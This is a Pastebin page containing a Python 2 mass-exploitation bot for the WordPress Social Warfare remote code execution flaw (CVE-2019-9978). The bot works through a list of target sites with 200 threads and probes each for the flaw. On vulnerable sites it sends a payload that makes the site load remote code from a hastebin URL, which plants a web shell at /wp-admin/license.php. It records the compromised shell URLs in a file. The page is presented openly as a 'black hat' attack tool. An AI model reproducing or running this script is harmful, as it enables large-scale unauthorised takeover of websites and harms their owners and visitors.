ToKeiChun

Wordpress Social Warfare Remote Code Execution (AUTO UPLOAD SHELL)

Sep 22nd, 2020 (edited)
863
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.82 KB | None | 0 0
  1. # -*- coding: utf-8 -*
  2. #!/usr/bin/python
  3. #####################################
  4. ##KILL THE NET##
  5. #### PS: CHANGE Your Threads pool on line 136 to make script more faster :)
  6. ## usage : python script.py list-of-sites.txt
  7. ## source : https://github.com/KTN1990/CVE-2019-9978
  8. ##############[LIBS]###################
  9. import requests, re, urllib2, os, sys, codecs, random              
  10. from multiprocessing.dummy import Pool                          
  11. from time import time as timer  
  12. import time
  13. from urlparse import urlparse
  14. import warnings
  15. import subprocess
  16. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  17. warnings.simplefilter('ignore',InsecureRequestWarning)
  18. reload(sys)  
  19. sys.setdefaultencoding('utf8')
  20. ##########################################################################################
  21. ktnred = '\033[31m'
  22. ktngreen = '\033[32m'
  23. ktn3yell = '\033[33m'
  24. ktn4blue = '\033[34m'
  25. ktn5purp = '\033[35m'
  26. ktn6blueblue = '\033[36m'
  27. ktn7grey = '\033[37m'
  28. CEND = '\033[0m'        
  29. #####################################
  30. ##########################################################################################
  31. try:
  32.     with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
  33.         ooo = f.read().splitlines()
  34. except IndexError:
  35.     print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' listsite.txt' + CEND)
  36.     pass
  37. ooo = list((ooo))
  38. ##########################################################################################
  39. def uploadrce(url):
  40.     try:
  41.         upload = url + '/wp-admin/admin-post.php?Legion=id&swp_debug=load_options&swp_url=https://hastebin.com/raw/iropememif'
  42.         Agent2 = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  43.         se2 = requests.session()
  44.         ktn3 = se2.get(upload, headers=Agent2, verify=False, timeout=10)
  45.         check = url + '/wp-admin/license.php'
  46.         ktn4 = se2.get(check, headers=Agent2, verify=False, timeout=10)
  47.         if 'kill_the_net' in ktn4.content:
  48.             print(ktn3yell + 'SHELL UPLOADED ====> [' + check + ']' + CEND)
  49.             open('shells_rce.txt', 'a').write(check+'\n')
  50.             pass
  51.         else:
  52.             print(ktnred + 'SHELL NOT-UPLOADED ====> [' + check + ']' + CEND)
  53.         pass
  54.     except:
  55.         pass
  56.     pass
  57. def rce_check(url):
  58.     try:
  59.         payload = url + '/wp-admin/admin-post.php?Legion=id&swp_debug=load_options&swp_url='
  60.         Agent1 = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  61.         se1 = requests.session()
  62.         ktn2 = se1.get(payload, headers=Agent1, verify=False, timeout=10)
  63.         if 'nothing found' in ktn2.content.encode('utf-8'):
  64.             print (ktn4blue + 'SITE VULN [' + url + ']' + CEND)
  65.             open('rcewp.txt', 'a').write(url+'\n')
  66.             uploadrce(url)
  67.             pass
  68.         else:
  69.             print (ktn7grey + 'SITE NOT VULN ..... [' + url + ']' + CEND)
  70.             pass       
  71.     except:
  72.         pass
  73.     pass
  74.  
  75. def check(url):
  76.     try:
  77.         Agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  78.         se = requests.session()
  79.         ktn1 = se.get(url, headers=Agent, verify=False, timeout=10)
  80.         if ktn1.status_code == 200:
  81.             print (ktngreen + 'SEARCHING FOR VULN ..... [' + url + ']' + CEND)
  82.             rce_check(url)
  83.             pass
  84.         else:
  85.             print (ktnred + 'DEAD SITE: ' + url + CEND)
  86.  
  87.         pass
  88.     except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as a:
  89.         print (ktnred + 'TIME OUT: ' + url + CEND)
  90.         check(url)
  91.         pass
  92.     except requests.exceptions.ConnectionError as b:
  93.         print (ktnred + 'DEAD SITE2: ' + url + CEND)
  94.         pass
  95.     pass
  96.  
  97.  
  98. #####################################
  99. def logo():
  100.     clear = "\x1b[0m"
  101.     colors = [36, 32, 34, 35, 31, 37]
  102.     x = '''
  103.         FEDERATION BLACK HAT SYSTEM | IG: @_gghost666_
  104.                              ...
  105.           s,                .                    .s
  106.            ss,              . ..               .ss
  107.            'SsSs,           ..  .           .sSsS'
  108.             sSs'sSs,        .   .        .sSs'sSs
  109.              sSs  'sSs,      ...      .sSs'  sSs
  110.               sS,    'sSs,         .sSs'    .Ss
  111.               'Ss       'sSs,   .sSs'       sS'
  112.      ...       sSs         ' .sSs'         sSs       ...
  113.     .           sSs       .sSs' ..,       sSs       .
  114.     . ..         sS,   .sSs'  .  'sSs,   .Ss        . ..
  115.     ..  .        'Ss .Ss'     .     'sSs. ''        ..  .
  116.     .   .         sSs '       .        'sSs,        .   .
  117.      ...      .sS.'sSs        .        .. 'sSs,      ...
  118.            .sSs'    sS,     .....     .Ss    'sSs,
  119.         .sSs'       'Ss       .       sS'       'sSs,
  120.      .sSs'           sSs      .      sSs           'sSs,
  121.   .sSs'____________________________ sSs ______________'sSs,
  122. .sSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS'.Ss SSSSSSSSSSSSSSSSSSSSSs,
  123.                        ...         sS'
  124.                         sSs       sSs
  125.                          sSs     sSs       - KTN
  126.                           sS,   .Ss
  127.                           'Ss   sS'
  128.                            sSs sSs
  129.                             sSsSs
  130.                              sSs
  131.                               s  
  132.                                      KILL THE NET
  133.                                     FB: fb/KtN.1990  
  134.               Note! : PRIVATE WORDPRESS RCE BOT '''
  135.  
  136.     for N, line in enumerate(x.split("\n")):
  137.         sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
  138.         time.sleep(0.05)
  139.         pass
  140.  
  141.  
  142. logo()
  143. ##########################################################################################
  144. def Main():
  145.     try:
  146.        
  147.         start = timer()
  148.         ThreadPool = Pool(200)
  149.         Threads = ThreadPool.map(check, ooo)
  150.         print('TIME TAKE: ' + str(timer() - start) + ' S')
  151.     except:
  152.         pass
  153.  
  154.  
  155. if __name__ == '__main__':
  156.     Main()
  157.  
Add Comment
Please, Sign In to add comment